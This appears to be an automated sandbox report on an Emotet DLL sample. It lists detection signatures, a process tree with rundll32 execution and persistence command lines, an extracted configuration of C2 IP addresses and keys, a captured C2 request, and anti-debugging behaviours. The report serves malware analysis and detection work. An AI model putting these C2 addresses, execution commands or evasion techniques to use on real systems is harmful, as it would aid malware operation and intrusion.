Windows Analysis Report spZRMihlrkFGqYq1f.dll

Overview

General Information

Sample Name: spZRMihlrkFGqYq1f.dll
Analysis ID: 531996
MD5: 9f4fa905fd685d28c4ff28f24ad224a1
SHA1: e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256: 808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf

Detection

Emotet
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6816 cmdline: loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6792 cmdline: rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3476 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.rundll32.exe.5880000.10.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.56b0000.6.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.4910000.9.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.3f80000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.59a0000.13.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started, Author: FPT.EagleEye, Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4928, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, ProcessId: 3476

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 7.2.rundll32.exe.5970000.12.raw.unpack, Malware Configuration Extractor: Emotet
Multi AV Scanner detection for submitted file
Source: spZRMihlrkFGqYq1f.dll, Metadefender: Detection: 42%
Source: spZRMihlrkFGqYq1f.dll, ReversingLabs: Detection: 56%
Source: spZRMihlrkFGqYq1f.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04EE1A80 FindFirstFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49775 -> 51.178.61.60:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 51.178.61.60 187
C2 URLs / IPs found in malware configuration
Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View, ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic, HTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1 Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View, IP Address: 196.44.98.190 196.44.98.190
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown, Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown, TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: svchost.exe, 0000000C.00000002.841835956.000001A770300000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmp, String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04EF1027 InternetReadFile
Source: unknown, HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: loaddll32.exe, 00000000.00000002.714043179.0000000000BFB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10014B67 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002C51C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow

E-Banking Fraud:

Yara detected Emotet
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      Source: spZRMihlrkFGqYq1f.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, File deleted: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Feetevsox\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003F350 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003EE82 appears 50 times
                      Source: spZRMihlrkFGqYq1f.dllMetadefender: Detection: 42%
                      Source: spZRMihlrkFGqYq1f.dllReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: classification engine Classification label: mal96.troj.evad.winDLL@17/0@0/20
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A742 _memset,GetDiskFreeSpaceA,GetLastError,3_2_1003A742
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1B54 CreateToolhelp32Snapshot,7_2_04EE1B54
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A0F4 __EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,3_2_1000A0F4
                      Source: rundll32.exe, 00000004.00000002.710493956.0000000003151000.00000004.00000020.sdmpBinary or memory string: penSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPA
                      Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_CURSOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_BITMAP
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_MENU
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_DIALOG
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_STRING
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F395 push ecx; ret 3_2_1003F3A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003EF21 push ecx; ret 3_2_1003EF34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1229 push eax; retf 4_2_030D129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1229 push eax; retf 6_2_042D129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1229 push eax; retf 7_2_04ED129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC7A
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: real checksum: 0xb4236 should be: 0xbc245
                      Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000BD3C IsIconic,GetWindowPlacement,GetWindowRect,3_2_1000BD3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022F30 GetParent,GetParent,IsIconic,GetParent,3_2_10022F30
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 4244 Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.2 %
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A2F3 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1003A2F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,3_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002F3E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1A80 FindFirstFileW,7_2_04EE1A80
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21194
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-20904
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21074
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 0000000C.00000002.841567859.000001A76FC8A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.841663587.000001A76FCEC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041482
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_1003D032
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EDE10 mov eax, dword ptr fs:[00000030h]4_2_030EDE10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EDE10 mov eax, dword ptr fs:[00000030h]6_2_042EDE10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEDE10 mov eax, dword ptr fs:[00000030h]7_2_04EEDE10
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004A43B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1004A43B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041482
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10039F21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10039F21

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.178.61.60 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_100472AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_10026ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_10047C26
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_10046C52
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,3_2_1004E4F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_100474FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,3_2_1004A54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1004D563
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,3_2_1004E631
